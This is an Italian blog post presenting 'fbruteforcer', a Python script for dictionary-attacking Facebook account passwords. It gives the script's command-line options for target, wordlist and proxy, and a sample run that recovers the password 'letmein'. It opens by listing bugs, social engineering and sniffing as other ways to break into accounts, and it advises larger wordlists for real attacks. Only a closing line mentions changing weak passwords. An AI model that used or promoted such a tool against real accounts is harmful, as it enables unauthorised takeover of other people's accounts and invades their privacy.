Craccare Facebook con fbruteforcer

Se non si riesce a craccare un account di Facebook sfruttando un bug, attuando qualche trucco di social-engineering o sniffando la passdword in una rete locale, non rimane che un’ultima carta da giocare: la cara vecchia forza bruta.

Dallo stesso autore di wpbruteforcer, script per recuperare la password di un account WordPress tramite dictionary-attack, eccovi oggi un script, sempre scritto in python, per attaccare un account Facebook.

Per i dettagli sull’installazione (anche questo script utilizza il modulo mechanize) vi rimando all’altro articolo.

I parametri obbligatori di questo script sono:

-u utente da attaccare (va bene anche l’indirizzo email)
-w nome del file contenente il dizionario

Inoltre è possibile utilizzare un proxy:

-p specifica l’indirizzo (e la porta) del proxy nel formato indirizzo:porta
-k eventuale nome utente del proxy
-i eventuale password per accedere al proxy

Ecco l’attacco (finto) al mio account, eseguito da Windows. Ho usato un dizionario di quattro parole (in uno scenario reale conviene usarne uno un po’ più corposo…):

C:\PH>fbrutecorcer.py -u angelorighi  -w dictionary.txt
 
Programmer : gunslinger_
Version       : 1.0
 
[*] Starting attack at 23:39:32
[*] Account for bruteforcing angelorighi
[*] Loaded : 4 words
[*] Bruteforcing, please wait...
[*] Trying letmein...

password trovata al terzo tentativo.

[*] Logging in success...
[*] Username : angelorighi
[*] Password : letmein

Tutto facile quindi? Naturalmente no. Se però avete il dubbio che la vostra password possa facilmente essere inserita in un dizionario di parole comuni correte a cambiarla.

Lo script lo potete trovare qui

24 comments to “Craccare Facebook con fbruteforcer”

Comments are closed.